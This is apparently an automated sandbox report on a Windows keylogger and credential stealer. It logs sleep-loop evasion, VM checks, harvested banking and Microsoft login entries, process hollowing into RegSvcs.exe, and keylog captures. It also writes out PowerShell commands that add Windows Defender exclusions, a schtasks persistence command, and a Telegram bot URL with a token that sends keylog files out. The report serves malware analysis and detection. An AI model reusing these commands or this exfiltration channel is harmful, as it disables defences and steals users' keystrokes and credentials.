                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000Thread sleep time: -594735s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000Thread sleep time: -594610s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000Thread sleep time: -594485s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000Thread sleep time: -594360s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000Thread sleep time: -594235s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000Thread sleep time: -594110s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000Thread sleep time: -593985s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000Thread sleep time: -593860s >= -30000sJump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 599862Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 599734Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 599625Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 599515Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 599406Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 599297Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 599187Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 599078Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 598969Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 598831Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 598703Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 598590Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 598483Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 598246Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 598140Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 598016Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 597906Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 597797Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 597687Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 597578Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 597468Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 597359Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 597250Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 597140Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 597031Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 596922Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 596812Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 596703Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 596562Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 596453Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 596344Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 596234Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 596124Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 596013Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 595906Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 595688Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 595575Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 595427Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 595275Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 595109Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 594984Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 594874Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 594763Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 594655Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 594547Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 594437Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 594328Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 594219Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 594109Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 594000Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 593890Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 593781Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 599891Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 599781Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 599672Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 599562Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 599453Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 599343Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 599234Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 599125Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 599015Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 598907Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 598782Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 598657Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 598532Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 598407Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 598282Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 598094Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 597985Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 597813Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 597687Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 597552Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 597355Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 597211Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 597110Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 596985Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 596860Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 596735Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 596610Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 596485Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 596360Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 596235Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 596110Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 595985Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 595860Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 595735Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 595610Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 595485Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 595360Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 595235Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 595110Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 594985Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 594860Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 594735Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 594610Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 594485Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 594360Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 594235Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 594110Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 593985Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 593860Jump to behavior
                    Source: WebData.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                    Source: WebData.12.drBinary or memory string: discord.comVMware20,11696428655f
                    Source: WebData.12.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                    Source: WebData.12.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                    Source: WebData.12.drBinary or memory string: global block list test formVMware20,11696428655
                    Source: WebData.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                    Source: RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B93000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2562039910.0000000003E60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBn
                    Source: WebData.12.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                    Source: WebData.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                    Source: WebData.12.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                    Source: WebData.12.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                    Source: WebData.12.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                    Source: WebData.12.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                    Source: WebData.12.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                    Source: WebData.12.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                    Source: WebData.12.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                    Source: ECmmsbHOaKPh.exe, 0000000D.00000002.1711596699.0000000006F10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: WebData.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                    Source: WebData.12.drBinary or memory string: outlook.office.comVMware20,11696428655s
                    Source: WebData.12.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                    Source: WebData.12.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                    Source: WebData.12.drBinary or memory string: AMC password management pageVMware20,11696428655
                    Source: WebData.12.drBinary or memory string: tasks.office.comVMware20,11696428655o
                    Source: g44YQtTyjN.exe, 00000000.00000002.1514045529.000000000734B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: WebData.12.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                    Source: WebData.12.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                    Source: WebData.12.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                    Source: WebData.12.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                    Source: WebData.12.drBinary or memory string: dev.azure.comVMware20,11696428655j
                    Source: WebData.12.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                    Source: WebData.12.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                    Source: WebData.12.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                    Source: g44YQtTyjN.exe, 00000000.00000002.1514045529.0000000007366000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll?
                    Source: WebData.12.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                    Source: WebData.12.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\g44YQtTyjN.exe"
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe"
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\g44YQtTyjN.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe"Jump to behavior
                    Allocates memory in foreign processes
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                    Sample uses process hollowing technique
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base address: 400000Jump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 458000Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 459000Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 689008Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 458000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 459000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 745008Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\g44YQtTyjN.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECmmsbHOaKPh" /XML "C:\Users\user\AppData\Local\Temp\tmp82D7.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECmmsbHOaKPh" /XML "C:\Users\user\AppData\Local\Temp\tmp8B71.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: KeyDataAwVeEbbs.txt.12.drBinary or memory string: [17:14:41]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 17:13:59]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2562493218.0000000004133000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 03]<<Program Manager
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :14:56]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B2D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:54]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2562493218.0000000004133000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:28]<<Program Manager>>5
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000BA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerC\donsocument
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A7B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:18]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2561816569.00000000035A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:42]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, KeyDataanrcUwNr.txt.12.drBinary or memory string: [17:13:19]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, KeyDataanrcUwNr.txt.12.drBinary or memory string: [17:13:20]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--:14:55]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--7]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 07]<<Program Manager>>[1
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A7B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: https://api.telegram.org/bot7879240328:AAHB7NT6yIB_0bX4QrhFBZNxniA38BjuGaw/sendDocument?chat_id=2001212894&caption=DC-KL:::user-PC\user\52]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2561816569.00000000035A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--:47]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 22]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A7B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:56]<<Program Manager_id":"AgADgh0AAoe-YFI","file_size":396},"caption":"DC-KeyDatabcwuTujf.txt:::user-PC\\user\\"}}
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp, KeyDataffeKRuYR.txt.12.drBinary or memory string: [17:13:32]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp, KeyDataffeKRuYR.txt.12.drBinary or memory string: [17:13:29]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A7B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \7879240328:AAHB7NT6yIB_0bX4QrhFBZNxniA38BjuGawvwxyz-fca7ff59c1138BjuGaw51]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:51]<<Program Manager><
                    Source: RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2562493218.0000000004133000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:51]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A64000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:08]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:02Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:55]<<Program Manager>
